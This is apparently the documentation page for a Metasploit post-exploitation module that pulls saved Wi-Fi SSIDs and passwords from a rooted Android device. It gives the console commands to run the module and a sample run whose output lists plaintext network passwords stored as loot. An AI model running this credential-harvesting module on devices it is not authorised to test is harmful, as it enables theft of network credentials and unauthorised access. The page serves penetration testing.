1.2 KiB
1.2 KiB
Vulnerable Application
This post-exploitation module will extract all saved Wireless access point credentials from the target android device.
Verification Steps
- Start
msfconsole - Get a root meterpreter session (use exploit/android/local/...)
use post/android/gather/wireless_apset SESSION <session id>run- You should be able to see the extracted credentials.
Options
SESSION
The session to run the module on.
Extracted data
Wireless AP credentials (SSID, network type and password)
Scenarios
msf exploit(multi/handler) > use post/android/gather/wireless_ap
msf post(android/gather/wireless_ap) > set session 1
session => 1
msf post(android/gather/wireless_ap) > run
Wireless APs
============
SSID net_type password
---- -------- --------
ADYYYXRoYXJ2YWpvc2hp WPA-PSK lkjhgfdsa
FCP_WiFi NONE
HomeCable WPA-PSK p@$$w0rd
Troika WPA-PSK ika@12345
[+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt
[*] Post module execution completed
msf post(android/gather/wireless_ap) >